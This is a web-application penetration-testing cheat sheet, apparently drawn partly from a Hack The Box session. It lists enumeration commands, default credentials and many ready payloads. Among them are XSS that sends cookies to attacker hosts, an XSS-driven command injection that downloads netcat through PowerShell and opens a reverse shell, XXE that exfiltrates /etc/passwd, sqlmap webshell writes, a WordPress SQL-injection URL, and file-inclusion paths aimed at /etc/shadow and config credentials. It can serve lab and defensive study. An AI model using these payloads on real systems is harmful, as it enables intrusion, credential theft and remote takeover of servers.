Web Testing Enumeration Good directory discovery tool: $ git clone https://github.com/maurosoria/dirsearch.git; cd dirsearch; python3 dirsearch.py -u http://$ip/ -e .php Directory discovery $ gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip Nmap HTTP Form Fuzzer $ nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip Testing Nmap Check the server methods $ nmap --script http-methods --script-args http-methods.url-path='/test' $ip Test OPTIONS against every folder/file. Test every GET/POST parameter against SQLI and RCE. View code run discovery tools Test params for: sqli, rfi, lfi Find hardcoded credentials JBoss JMX Console http://$ip:8080/jmxconcole/ War File Joomla configuration.php diagnostics.php joomla.inc.php config.inc.php Mambo configuration.php config.inc.php WordPress setup-config.php wp-config.php Authentication Tomcat manager, try default credentials: tomcat/tomcat, admin/manager, admin/password, admin/s3cret, admin (emtpy password). Try password reuse between services Google default credentials for app Drupal $ droopescan scan -u $ip WordPress Scan for known bugs: $ wpscan http://$ip Try exploit: /wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_concat%28user_login,0x3a,user_pass%29+from+wp_users%23 Webdav Test incorrect permissions: $ cadaver http://$ip $ davtest http://$ip Bruteforcing Good password list https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/10_million_password_list_top_1000.txt File uploads Avoid extension checks using tricks like: .php5.jpeg .php5%00.jpeg Different file formats https://en.wikipedia.org/wiki/List_of_file_signatures Different extensions .php .php3 .php4 .php5 PHP You can usually bypass file include filters with payloads like: php://filter/convert.base64-encode/resource=file If you control an include statenent such as include("lang/".$_COOKIE['lang']); You can set a cookie pointing to an arbitrary PHP file and have it executed in your page. SSL certificates Find out potential correct vhost to GET is the clock skewed Any names that could be usernames for bruteforce/guessing. Login Always try user root, admin, administrator with password letmein admin root File downloads Run strings against every file XSS vectors Invisible iframe: <iframe src="http://attacker/" height="0" width="0"></iframe> Steal cookies <script> new Image().src="http://attacker:8000/bogus.php?output="+document.cookie; </script> root@kali:~/htb/bankrobber# python3 -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.10.154 - - [29/Jan/2020 03:24:29] code 404, message File not found 10.10.10.154 - - [29/Jan/2020 03:24:29] "GET /bogus.php?output=username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP/1.1" 404 - mysql file write root@kali:~/htb# sqlmap -r req2 --dbms mysql --file-write=s2.php --file-dest="C:/Inetpub/wwwroot/s2.php" mysql File Read root@kali:~/htb/# sqlmap -r req2 --dbms mysql --file-read="C:/xampp/htdocs/adminbackdoorchecker.php" root@kali:~/.sqlmap/output/10.10.x.x/files# cat C__xampp_htdocs_admin_backdoorchecker.php <?php include('../link.php'); --snip-- } else{ echo "You are not allowed to use this function!"; } Working XSS scripts ( document cookie catch + shell upload&execute ! <script> <img src=x onerror=this.src='http://10.10.14.10:8000/?c='+document.cookie></script> <script type="text/javascript">var Http = new XMLHttpRequest();var url='/admin/backdoorchecker.php'; var params='cmd=dir| powershell -c "iwr -uri http://10.10.14.10:8000/nc64.exe -outfile %temp%\a.exe";%temp%\a.exe -e cmd.exe 10.10.14.10 1111' ;Http.open("POST", url, true);Http.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');Http.send(params);</script> Payload no space <svg/onload=alert(1)> filter bypass <svg•onload=alert(1)> Command injection `id` | id && id error || id %0a id time based sleep 10 LDAP injection ) foo) ((cn=*) (|(cn=[INPUT1])(cn=[INPUT2])) (&(cn=[INPUT1])(userPassword=[INPUT2])) Try wildcard * or partial match a*, ad*.. XPath injection ' and '1'='1 ' or '1'='0 ' and '1'='0 ' or '1'='1 foo']%00 foo' or 1=1]%00 '%20or%201=1]/child::node()%00 PHP code injection ".system('id'); $a="".system('id');# ".system('id');// foo);}system('id');// '.phpinfo().' XML External Entity <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > <!ENTITY callhome SYSTEM "bad.com/?%xxe;"> ] > <foo>&xxe;&callhome;</foo> <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ] > <foo>&xxe;</foo> Send /etc/passwd to your box: <!ENTITY % p1 SYSTEM "file:///etc/passwd"><!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://192.168.159.1:3001/BLAH?%p1;'>">%p2; XML Injection <!–/–> ORM Injection OR 1– Header injection %0d%0a Leads to open redirection and session fixation RFI/LFI Test it: $ fimap -u "http://$ip/example.php?test=" Automated scanning $ https://github.com/lightos/Panoptic/ Interesting payloads: /etc/passwd | /etc/shadow #instant win /var/www/html/config.php # or similar paths to get SQL etc creds ?page=php://filter/convert.base64-encode/resource=../config.php ../../../../../boot.ini # to find out windows version* php://input php://filter/convert.base64-encode/resource=../../../../../etc/passwd /etc/issue /proc/version /etc/profile /etc/passwd /etc/shadow /root/.bash_history /var/log/dmessage /var/mail/root /var/spool/cron/crontabs/root /proc/self/environ /proc/self/cmdline /proc/self/stat /proc/self/status /proc/self/fd/0 /proc/self/fd/1 /proc/self/fd/2 /httpd/logs/access.log /apache/logs/access.log logs/access.log /var/log/access_log /var/log/httpd/access_log /var/log/httpd-error.log /var/log/apache/access.log /var/log/apache2/access.log /var/log/httpd-access.log /var/log/httpd/access_log /var/log/httpd/access.log /var/www/html/index.php /var/www/index.php /var/www/manual/index.html /etc/httpd/logs/access_log /etc/httpd/logs/access.log /etc/httpd/logs/error_log /etc/httpd/logs/error.log /var/log/apache2/access_log /var/log/apache2/access.log /var/log/apache2/error_log /var/log/apache2/error.log /var/log/apache/access_log /var/log/apache/access.log /var/log/auth.log /var/log/chttp.log /var/log/cups/error_log /var/log/dpkg.log /var/log/faillog /var/log/httpd/access_log /var/log/httpd/access.log /var/log/httpd/error_log /var/log/httpd/error.log /var/log/lastlog /var/log/lighttpd/access.log /var/log/lighttpd/error.log /var/log/lighttpd/lighttpd.access.log /var/log/lighttpd/lighttpd.error.log /var/log/messages /var/log/secure /var/log/syslog /var/log/wtmp /var/log/xferlog /var/log/yum.log /var/run/utmp /var/webmin/miniserv.log /var/www/logs/access_log /var/www/logs/access.log Test credentials admin admin admin password admin <blank> admin nameofservice admin s3cret root root root admin root password root nameofservice root s3cret Other tricks If there is a share link or a way to pass a URL that you can manipulate, try duplicating the parameters If there is a UID parameter, try to replace it with another users one or do HPP passing both in different orders. Intercept all the interesting requests, look for missing CSRF tokens in critical actions and try repeating them with them. To bypass XSS filters: try submitting URL encoded strings, if decoded: bingo. Restoring javascript functions javascript:document.write=HTMLDocument.prototype.write;document.write(‘STRUKT’); XSS no barces <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// reference used : https://guif.re/webtesting#Other%20tricks